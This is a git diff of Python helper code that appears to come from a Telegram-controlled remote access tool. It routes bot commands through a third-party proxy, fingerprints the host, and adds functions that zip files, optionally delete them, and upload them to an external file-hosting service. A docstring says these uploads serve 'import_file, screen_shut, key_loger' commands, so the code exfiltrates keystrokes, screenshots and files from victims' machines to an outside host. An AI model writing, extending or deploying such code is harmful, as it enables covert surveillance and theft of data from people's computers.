@@ -8,8 +8,9 @@ import requests
 import json
 import platform
 import time
+import zipfile
 
-from os import getcwd, getpid
+from os import getcwd, getpid, path, remove
 from socket import gethostname, gethostbyname
 from uuid import getnode as get_system_mac_addres
 from bs4 import BeautifulSoup
@@ -119,7 +120,7 @@ def post_data(url, logger) -> bool:
         return False
 
 
-def post_data_by_third_party_proxy(url, logger):
+def post_data_by_third_party_proxy(url, logger, time_out=5):
     '''
     return False or response \n
     Send information using the http debugger site \n
@@ -136,7 +137,7 @@ def post_data_by_third_party_proxy(url, logger):
         response = requests.post(
             url="https://www.httpdebugger.com/Tools/ViewHttpHeaders.aspx",
             data=payload,
-            timeout=5)
+            timeout=time_out)
 
         if response.status_code == 200:
             logger.info(
@@ -155,6 +156,20 @@ def post_data_by_third_party_proxy(url, logger):
         return False
 
 
+def clean_response_third_party_proxy(response, logger):
+    '''get http response from third party proxy (http debuger .com) and get telegram data'''
+    try:
+        response_source = response.text
+        response_source = BeautifulSoup(response_source, "html.parser")
+        response_source = response_source.find("div", id="ResultData").text
+        return response_source.strip()
+
+    except Exception as error:
+        logger.info(
+            f'clean_response_third_party_proxy: {error}')
+        return False
+
+
 def get_update_by_third_party_proxy(TELEGRAM_TOKEN, logger):
     '''Get the latest command sent to the bot in the last 24 hours by third party proxy'''
 
@@ -169,14 +184,14 @@ def get_update_by_third_party_proxy(TELEGRAM_TOKEN, logger):
         return False
 
     try:
-
-        response_source = response.text
-        response_source = BeautifulSoup(response_source, "html.parser")
-        response_source = response_source.find("div", id="ResultData").text
+        response_source = clean_response_third_party_proxy(
+            response, logger=logger)
+        if not response_source:
+            return False
 
         if 'The remote server returned an error' in response_source:
             logger.error(
-                f'get_update_by_third_party_proxy [False TOKEN or ADMIN_CHAT_ID] error: {response_source}')
+                f'get_update_by_third_party_proxy: [False TOKEN , ADMIN_CHAT_ID or api data] error: {response_source}')
             return False
 
         response_source = response_source.replace("Response Content", "")
@@ -250,3 +265,114 @@ def extract_last_admin_command(messages: list, ADMIN_CHAT_ID: str, TELEGRAM_TOKE
     set_message_ofset(messages, TELEGRAM_TOKEN, ADMIN_CHAT_ID, logger)
 
     return message_text
+
+
+def make_zip_file(route, logger, delete_input_file=False):
+    '''get file route, make zip file and save to courent route \n
+    return True, new_file_name |or| return False, 'None' \n
+    sample: istrue, file_name = make_zip(./test.txt)
+
+    To send a file in Telegram, this file must be zipped
+    '''
+
+    # input: /home/onion/text.py ooutput: text.zip
+    new_file_name = path.splitext(path.basename(route))[0]
+    new_file_name = f'{new_file_name}.zip'
+
+    if not path.isfile(route):
+        logger.error('make_zip_file: is not a file')
+        return False, 'None'
+
+    try:
+        with zipfile.ZipFile(new_file_name, "w", compression=zipfile.ZIP_DEFLATED) as zf:
+            zf.write(route, path.basename(route))
+
+        logger.info(
+            f'make_zip_file: The file was successfully zipped, file name {new_file_name}')
+
+        if delete_input_file:
+            remove(route)
+
+        return True, new_file_name
+
+    except Exception as error:
+        logger.error(f'make_zip_file: {error}')
+        return False, error
+
+
+def conver_json_to_dict(json_data: json) -> dict:
+    '''loads json data and convert to a dict'''
+    return json.loads(json_data)
+
+
+def upload_server_1(file: bytes, file_name: str, logger, time_out: int = 1200):
+    # time_out 1200: 20 min
+    '''api for upload zip file and return download link \n
+    this use in commands: import_file, screen_shut, key_loger,.. \n
+    its not safe for file transfer!
+    api from: up.ufile.io
+    size limit 5GB'''
+    create_session_link = 'https://up.ufile.io/v1/upload/create_session'
+    chunk_link = 'https://up.ufile.io/v1/upload/chunk'  # Send part of the file
+    finalise_link = 'https://up.ufile.io/v1/upload/finalise'
+    file_size = {'file_size': len(file)}
+    files = {'file': file}
+
+    # create session for upload file
+    # TODO: add for lop for get a session
+    try:
+        session = requests.post(create_session_link,
+                                data=file_size, timeout=30)
+        if session.status_code != 200:
+            logger.error(
+                f'upload_server_1.create session: status code: {session.status_code}, text: {session.text}')
+            return False, 'None'
+        # session FUID:
+        FUID = conver_json_to_dict(session.text)['fuid']
+    except Exception as error:
+        logger.error(f'upload_server_1.create session: {error}')
+        return False, 'None'
+
+    # upload file
+    # TODO: Divide the data into small pieces and upload them
+    try:
+        chunk_data = {'chunk_index': 1, 'fuid': FUID}
+        chunk_res = requests.post(chunk_link, data=chunk_data,
+                                  files=files, timeout=time_out)
+        if chunk_res.status_code != 200:
+            logger.error(
+                f'upload_server_1.upload file: status code: {chunk_res.status_code}, text: {chunk_res.text}')
+            return False, 'None'
+    except Exception as error:
+        logger.error(f'upload_server_1.upload file : {error}')
+        return False, 'None'
+
+    # close session
+    try:
+        finalise_headers = {
+            'fuid': FUID,
+            'file_name': file_name,
+            'file_type': 'zip',
+            'total_chunks': 1
+        }
+
+        finalis_res = requests.post(
+            finalise_link, data=finalise_headers, timeout=30)
+        if finalis_res.status_code != 200:
+            logger.error(
+                f'upload_server_1.close session , status code: {finalis_res.status_code}, text: {finalis_res.text}')
+            return False, 'None'
+    except Exception as error:
+        logger.error(f'upload_server_1.close session error: {error}')
+        return False, 'None'
+
+    # extract download link
+    try:
+        download_link = conver_json_to_dict(finalis_res.text)
+        response = ''
+        for key, value in download_link.items():
+            response = response + f'\n{key}: {value}'
+        return True, response
+    except Exception as error:
+        logger.error(f'upload_server_1.extract download link error: {error}')
+        return False, 'None'
